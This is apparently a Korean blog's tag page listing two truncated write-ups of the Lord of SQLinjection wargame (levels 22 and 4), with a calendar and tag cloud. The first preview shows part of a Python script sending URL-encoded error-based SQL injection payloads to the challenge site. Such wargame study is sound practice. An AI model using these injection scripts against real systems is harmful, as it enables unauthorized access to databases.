| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 | 31 |
- 세션
- 자바 is-a
- XSS
- lord of sqlinjection`
- 클라이언트
- Lord of sqlinjection
- sql
- APM
- 스프링구조
- lord of sqlinjectin
- 웹 개발
- sqlinjection
- 마이크로서비스 아키택트
- 자바 문법
- 해킹
- php
- 자바 Array list
- 쿠키
- 서버
- 보안
- 웹
- 세션쿠키
- injection
- 소켓
- Los
- 자바 has-a
- 스프링
- 자바
- 스프링 종류
- 스프링 특징
- Today
- Total
목록Lord of sqlinjection (2)
LJ
Lord of SQLinjection ( 22번 ) dark eyes
22번 다크 아이즈 이다. 21번 문제와 같이 에러 기반 인젝션이다. 다른점이 있다면 if를 사용하지 못한다. (case when 도 사용하지 못한다.) import requestsurl = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"cookie = dict(PHPSESSID="4jnokk4mvhdm24glsa8dsqr45v")def pw_length(): print("**** find for pw length ****") for i in range(0, 20): param = f"?pw=%27%20or%20id=%27admin%27%20and%20(select%201%20u..
Lord of SQLinjection ( 4번 )
Lord of SQLinjection 4번 orc이다. 간단한 코드 리뷰 및 분석1. query : {$query}"; // 쿼리 출력8. $result = @mysqli_fetch_array(mysqli_query($db,$query)); // 쿼리 실행 및 결과 추출9. if($result['id']) echo "Hello admin"; // 관리자 확인//이 조건문은 $result['id']에 값이 있고 그 값이 참(true)으로 평가될 경우 (즉, 'admin' 등과 같이 빈 문자열이 아닌 경우) 실행10. 11. $_GET[pw] = addslashes($_GET[pw]); // SQL 인젝션 방지를 위한 addslashes 사용12. $query = "select pw from ..